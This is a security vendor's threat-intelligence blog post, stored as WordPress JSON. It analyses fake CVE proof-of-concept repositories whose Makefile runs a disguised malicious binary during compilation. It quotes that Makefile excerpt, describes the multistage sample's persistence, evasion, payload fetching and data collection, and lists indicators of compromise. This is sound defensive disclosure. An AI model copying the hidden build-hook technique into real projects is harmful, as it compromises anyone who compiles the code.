{"id":25088,"date":"2023-07-05T06:30:31","date_gmt":"2023-07-05T06:30:31","guid":{"rendered":"https:\/\/nsfocusglobal.com\/?p=25088"},"modified":"2026-04-17T18:07:40","modified_gmt":"2026-04-17T18:07:40","slug":"alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack","status":"publish","type":"post","link":"https:\/\/nsfocusglobal.com\/pt-br\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\/","title":{"rendered":"Alert: Vulnerability Researchers and Red Team Members Targeted in Watering Hole Attack"},"content":{"rendered":"<!DOCTYPE html PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/REC-html40\/loose.dtd\">\n<html><body><p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Background <\/h2>\n\n\n\n<p>NSFOCUS researchers detected a code poisoning attack against vulnerability researchers and red team members recently. Attackers use implanted malicious programs in multiple code repositories under the cover of two highly exploitable vulnerabilities of Linux and VMware exposed this year. Once a user downloads the code and compiles it locally, malicious code contained in the compilation script will be executed to allow hackers to gain host control.<\/p>\n\n\n\n<p>Up to now, two code repositories containing malicious code and the CnC address are still alive, which means that it remains an ongoing attack.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-1-1.jpg\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"515\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-1-1-1024x515.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-25090\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-1-1-1024x515.jpg 1024w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-1-1-300x151.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-1-1-768x386.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-1-1-1536x772.jpg 1536w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-1-1-600x301.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-1-1-200x100.jpg 200w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-1-1.jpg 1811w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\">Figure 1 PoC repository 1 with malicious code &#8211; &nbsp;Linux kernel privilege escalation vulnerability<\/figcaption><\/figure>\n<\/div>\n\n\n<p><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-2-1.jpg\"><img decoding=\"async\" width=\"1024\" height=\"565\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-2-1-1024x565.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-25092\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-2-1-1024x565.jpg 1024w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-2-1-300x165.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-2-1-768x424.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-2-1-1536x847.jpg 1536w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-2-1-600x331.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-2-1-200x110.jpg 200w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-2-1.jpg 1641w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\">Figure 2 PoC repository 2 with malicious code &#8211;&nbsp; VMware privilege escalation vulnerability<\/figcaption><\/figure>\n<\/div>\n\n\n<p><\/p>\n\n\n\n<p>From the submission records, it can be found that the attacker has uploaded relevant malicious codes multiple times from the end of June 2023.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-3-1.jpg\"><img decoding=\"async\" width=\"1024\" height=\"605\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-3-1-1024x605.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-25094\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-3-1-1024x605.jpg 1024w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-3-1-300x177.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-3-1-768x453.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-3-1-600x354.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-3-1-200x118.jpg 200w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-3-1.jpg 1409w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\">Figure 3 Code Commit Timeline<\/figcaption><\/figure>\n<\/div>\n\n\n<p>The attack intention was revealed two days after the malicious code was uploaded, and repo users disputed an allegation in the issue that this PoC is fake and malicious code is implanted.<\/p>\n\n\n\n<p><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-4-1.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"919\" height=\"871\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-4-1.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-25096\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-4-1.jpg 919w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-4-1-300x284.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-4-1-768x728.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-4-1-600x569.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-4-1-200x190.jpg 200w\" sizes=\"(max-width: 919px) 100vw, 919px\" \/><\/a><figcaption class=\"wp-element-caption\">Figure 4 Comments about fake PoC <\/figcaption><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading\">Analysis of Techniques and Tactics<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-5-1.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"776\" height=\"356\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-5-1.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-25114\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-5-1.jpg 776w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-5-1-300x138.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-5-1-768x352.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-5-1-600x275.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-5-1-200x92.jpg 200w\" sizes=\"(max-width: 776px) 100vw, 776px\" \/><\/a><figcaption class=\"wp-element-caption\">Figure 5 Execution flow<\/figcaption><\/figure>\n<\/div>\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Poisoning of disguised compiled configuration files<\/h3>\n\n\n\n<p>From the perspective of <a href=\"https:\/\/nsfocusglobal.com\/pt-br\/threats-against-software-supply-chain-security\/\" target=\"_blank\" rel=\"noreferrer noopener\">supply chain security<\/a>, attackers used code poisoning to carry out attacks in the process of code compilation. Instead of hosting the binary payload in a repository, as is often the case for phishing, implanting malicious code and compiling configuration files are undoubtedly more subtle.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>CFLAGS= -I.\/inc\nLDFLAGS= -pthread -static\n\nall: obj $(TARGET) get_root\n\n$(TARGET): $(OBJECTS)\n    $(CC) $(LDFLAGS) -o $@ $^\n    strip $@\n.\/src\/aclocal.m4 &lt;--Execute malicious programs contained in the repository<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p>The Makefile compilation configuration file contains the commands required to compile and generate binaries, and an attacker inserts the process of executing the file aclocal.m4 in the src directory during the normal compilation flow. This file is actually a default configuration file in GNU automake, which is renamed to deceive the victim. The file aclocal.m4 itself is a malicious program for Linux systems. Once the user executes the make command, the compilation project will be enabled.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>aclocal.m4: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2,\nBuildID[sha1]=9fc8befaa32a1a88133dd077db0369576313e6d2, for GNU\/Linux 3.2.0, stripped<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Multistage Malicious Sample kworker with Built-in Defense Evasion Feature<\/h3>\n\n\n\n<p>Copy itself to the HOME directory and add persistence at first execution<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-6-1.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"342\" height=\"195\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-6-1.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-25098\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-6-1.jpg 342w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-6-1-300x171.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-6-1-150x85.jpg 150w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-6-1-200x114.jpg 200w\" sizes=\"(max-width: 342px) 100vw, 342px\" \/><\/a><figcaption class=\"wp-element-caption\">Figure 6 Copy itself to the HOME directory and add persistence<\/figcaption><\/figure>\n<\/div>\n\n\n<p>Defense Evasion: timestamp modification; attacker connection through timestamp forgery<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-7-1.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"336\" height=\"146\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-7-1.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-25116\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-7-1.jpg 336w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-7-1-300x130.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-7-1-200x87.jpg 200w\" sizes=\"(max-width: 336px) 100vw, 336px\" \/><\/a><figcaption class=\"wp-element-caption\">Figure 7 Defense evasion<\/figcaption><\/figure>\n<\/div>\n\n\n<p>Pull the content from the hardcoded URL and decrypt it.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-8-2.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"486\" height=\"474\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-8-2.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-25102\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-8-2.jpg 486w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-8-2-300x293.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-8-2-200x195.jpg 200w\" sizes=\"(max-width: 486px) 100vw, 486px\" \/><\/a><figcaption class=\"wp-element-caption\">Figure 8 Pull the content and decrypt it<\/figcaption><\/figure>\n<\/div>\n\n\n<p>During the test, it was found that when a request is made incorrectly, the attacker server returns empty content and blacklists the requested IP address.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-9-1.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"378\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-9-1-1024x378.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-25104\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-9-1-1024x378.jpg 1024w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-9-1-300x111.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-9-1-768x283.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-9-1-600x221.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-9-1-200x74.jpg 200w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-9-1.jpg 1076w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\">Figure 9 Empty content is returned<\/figcaption><\/figure>\n<\/div>\n\n\n<p>The real content requested is a bash script <sup>[1]<\/sup>. On the one hand, this bash script collects information and uploads it to the public repository, and then sends it back to the repository for linking to the server; on the other hand, it realizes persistence and continuous control through SSH.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10-1.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"919\" height=\"1024\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10-1-919x1024.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-25120\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10-1-919x1024.jpg 919w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10-1-269x300.jpg 269w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10-1-768x855.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10-1-600x668.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10-1-200x223.jpg 200w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10-1.jpg 1247w\" sizes=\"(max-width: 919px) 100vw, 919px\" \/><\/a><figcaption class=\"wp-element-caption\">Figure 10 Returned content<\/figcaption><\/figure>\n<\/div>\n\n\n<p>As of this article, <a href=\"https:\/\/nti.nsfocusglobal.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">NSFOCUS Threat Intelligence<\/a> has supported detection and alert on threat intelligence of involved infrastructure.  Some NSFOCUS&#8217;s products have captured attack events using the malware.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10-.png\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"462\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10--1024x462.png\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-25106\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10--1024x462.png 1024w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10--300x135.png 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10--768x346.png 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10--1536x693.png 1536w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10--600x271.png 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10--200x90.png 200w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/Figure-10-.png 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\">Figure 11 Screenshot from NSFOCUS Threat Intelligence (NTI)<\/figcaption><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading\">Conclusion<\/h2>\n\n\n\n<p>In recent years, similar attacks targeting vulnerability researchers and red team members by using vulnerability exploits as baits are not uncommon. However, compared with the previous method of baiting malicious EXE files, implanting malicious codes in compiled configuration files makes the exploitation chain that triggers malicious behaviors during compilation more covert. However, it requires the victim to have the vulnerability EXP command line compilation ability, which undoubtedly screens out a number of people who are used to executing vulnerability exploitation programs simply downloaded on the Internet, which means that the target has been shifted to vulnerability researchers or red team members capable of weaponizing vulnerabilities.<\/p>\n\n\n\n<p>Based on the existing intelligence and preliminary detection of the attacker&#8217;s infrastructure, we believe that this code poisoning attack could be long-simmered and a part of a persistent attack: select a small project with low attention and low stars to test the feasibility, and collect necessary information for later intended activities.<\/p>\n\n\n\n<p><strong>IOC Information <\/strong><\/p>\n\n\n\n<p><strong>Malicious Github Repo:<\/strong><br>https:\/\/github.com\/ChriSanders22\/CVE-2023-20871-poc<br>https:\/\/github.com\/ChriSanders22\/CVE-2023-35829-poc<br><strong>Malicious sample kworker SHA256: <\/strong>caa69b10b0bfca561dec90cbd1132b6dcb2c8a44d76a272a0b70b5c64776ff6c<br><strong>Payload delivery, CnC address:<\/strong><br>http:\/\/cunniloss[.]accesscam[.]org\/hash[.]php<\/p>\n\n\n\n<p><strong>Reference<\/strong><\/p>\n\n\n\n<p><blockquote class=\"twitter-tweet\" data-width=\"550\" data-dnt=\"true\"><p lang=\"en\" dir=\"ltr\">For anyone that has ran this PoC, consider your data stolen. This is what eventually runs on your host after a few stages. If you wanna analyse it, don&#39;t use a web browser or your IP will get blacklisted. <a href=\"https:\/\/twitter.com\/hashtag\/CVE_2023_35829?src=hash&amp;ref_src=twsrc%5Etfw\">#CVE_2023_35829<\/a> <a href=\"https:\/\/twitter.com\/hashtag\/backdoor?src=hash&amp;ref_src=twsrc%5Etfw\">#backdoor<\/a> <a href=\"https:\/\/t.co\/gafdPfDc0r\">https:\/\/t.co\/gafdPfDc0r<\/a> <a href=\"https:\/\/t.co\/fUIqclSARX\">pic.twitter.com\/fUIqclSARX<\/a><\/p>&mdash; Andrei Scutariu (@xnand_) <a href=\"https:\/\/twitter.com\/xnand_\/status\/1676336329985077249?ref_src=twsrc%5Etfw\">July 4, 2023<\/a><\/blockquote><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n\n\n\n<p><\/p>\n<\/body><\/html>\n","protected":false},"excerpt":{"rendered":"<p>Background NSFOCUS researchers detected a code poisoning attack against vulnerability researchers and red team members recently. Attackers use implanted malicious programs in multiple code repositories under the cover of two highly exploitable vulnerabilities of Linux and VMware exposed this year. Once a user downloads the code and compiles it locally, malicious code contained in the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":25111,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_coblocks_attr":"","_coblocks_dimensions":"","_coblocks_responsive_height":"","_coblocks_accordion_ie_support":"","footnotes":""},"categories":[3],"tags":[693],"class_list":["post-25088","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","tag-threat-intelligence"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Alert: Vulnerability Researchers and Red Team Members Targeted in Watering Hole Attack - NSFOCUS<\/title>\n<meta name=\"description\" content=\"NSFOCUS researchers detected a code poisoning attack against vulnerability researchers and red team members recently. Attackers use implanted malicious programs in multiple code repositories under the cover of two highly exploitable vulnerabilities of Linux and VMware exposed this year. Once a user downloads the code and compiles it locally, malicious code contained in the compilation script will be executed to allow hackers to gain host control.\" \/>\n<meta name=\"robots\" content=\"noindex, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Alert: Vulnerability Researchers and Red Team Members Targeted in Watering Hole Attack - NSFOCUS\" \/>\n<meta property=\"og:description\" content=\"NSFOCUS researchers detected a code poisoning attack against vulnerability researchers and red team members recently. Attackers use implanted malicious programs in multiple code repositories under the cover of two highly exploitable vulnerabilities of Linux and VMware exposed this year. Once a user downloads the code and compiles it locally, malicious code contained in the compilation script will be executed to allow hackers to gain host control.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nsfocusglobal.com\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\/\" \/>\n<meta property=\"og:site_name\" content=\"NSFOCUS\" \/>\n<meta property=\"article:published_time\" content=\"2023-07-05T06:30:31+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-17T18:07:40+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/feature-image.png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"Alert: Vulnerability Researchers and Red Team Members Targeted in Watering Hole Attack - NSFOCUS\" \/>\n<meta name=\"twitter:description\" content=\"NSFOCUS researchers detected a code poisoning attack against vulnerability researchers and red team members recently. Attackers use implanted malicious programs in multiple code repositories under the cover of two highly exploitable vulnerabilities of Linux and VMware exposed this year. Once a user downloads the code and compiles it locally, malicious code contained in the compilation script will be executed to allow hackers to gain host control.\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/feature-image.png\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#\\\/schema\\\/person\\\/fd9ab61c9c77a81bbd870f725cc0c61d\"},\"headline\":\"Alert: Vulnerability Researchers and Red Team Members Targeted in Watering Hole Attack\",\"datePublished\":\"2023-07-05T06:30:31+00:00\",\"dateModified\":\"2026-04-17T18:07:40+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\\\/\"},\"wordCount\":724,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2023\\\/07\\\/feature-image.png\",\"keywords\":[\"threat intelligence\"],\"articleSection\":[\"Blog\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/nsfocusglobal.com\\\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\\\/\",\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\\\/\",\"name\":\"Alert: Vulnerability Researchers and Red Team Members Targeted in Watering Hole Attack - NSFOCUS\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2023\\\/07\\\/feature-image.png\",\"datePublished\":\"2023-07-05T06:30:31+00:00\",\"dateModified\":\"2026-04-17T18:07:40+00:00\",\"description\":\"NSFOCUS researchers detected a code poisoning attack against vulnerability researchers and red team members recently. Attackers use implanted malicious programs in multiple code repositories under the cover of two highly exploitable vulnerabilities of Linux and VMware exposed this year. Once a user downloads the code and compiles it locally, malicious code contained in the compilation script will be executed to allow hackers to gain host control.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\\\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/nsfocusglobal.com\\\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\\\/#primaryimage\",\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2023\\\/07\\\/feature-image.png\",\"contentUrl\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2023\\\/07\\\/feature-image.png\",\"width\":441,\"height\":267,\"caption\":\"Magnifying glass over red digital bug.\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/nsfocusglobal.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Alert: Vulnerability Researchers and Red Team Members Targeted in Watering Hole Attack\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#website\",\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/\",\"name\":\"NSFOCUS\",\"description\":\"Security Made Smart and Simple\",\"publisher\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#organization\",\"name\":\"NSFOCUS\",\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2024\\\/08\\\/logo-ns.png\",\"contentUrl\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2024\\\/08\\\/logo-ns.png\",\"width\":248,\"height\":36,\"caption\":\"NSFOCUS\"},\"image\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Perso